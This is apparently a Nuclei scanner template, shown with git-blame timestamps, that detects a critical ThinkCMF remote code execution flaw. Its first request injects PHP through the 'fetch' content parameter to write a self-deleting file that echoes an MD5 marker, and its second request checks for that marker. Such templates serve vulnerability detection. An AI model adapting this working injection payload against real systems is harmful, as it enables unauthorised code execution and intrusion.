2021-02-11 17:49:03 +00:00
|
|
|
id: thinkcmf-rce
|
2021-02-11 17:31:25 +00:00
|
|
|
|
|
|
|
info:
|
2022-06-03 19:12:31 +00:00
|
|
|
name: ThinkCMF - Remote Code Execution
|
2021-02-11 17:31:25 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: critical
|
2022-06-03 19:12:31 +00:00
|
|
|
description: ThinkCMF is susceptible to a remote code execution vulnerability.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.freebuf.com/vuls/217586.html
|
2022-06-03 19:12:31 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
2023-10-14 11:27:55 +00:00
|
|
|
cvss-score: 10
|
2022-06-03 19:12:31 +00:00
|
|
|
cwe-id: CWE-77
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 2
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: thinkcmf,rce,intrusive
|
2021-02-11 17:31:25 +00:00
|
|
|
|
2024-04-15 11:26:37 +00:00
|
|
|
variables:
|
|
|
|
string: "thinkcmf-rce"
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-09-30 14:52:53 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
2024-04-15 11:26:37 +00:00
|
|
|
GET /index.php?a=fetch&content={{url_encode('<?php file_put_contents(\"{{randstr}}.php\",\"<?php echo md5(\"{{string}}\");unlink(__FILE__);\");')}} HTTP/1.1
|
2021-09-30 14:52:53 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
- |
|
|
|
|
GET /{{randstr}}.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2021-02-11 17:31:25 +00:00
|
|
|
|
2021-09-30 14:52:53 +00:00
|
|
|
matchers:
|
2024-04-15 11:26:37 +00:00
|
|
|
- type: word
|
|
|
|
part: body_2
|
|
|
|
words:
|
|
|
|
- '{{md5(string)}}'
|
2024-04-23 10:06:08 +00:00
|
|
|
# digest: 4a0a00473045022030890616e0f09cfc90e2452536e18123bff965a717169a2ef213532afea46c2b022100d2b32714e9bb740a01c43baef809ef37cde80648c9163d97ab0e741f9da9c3ec:922c64590222798bb761d5b6d8e72950
|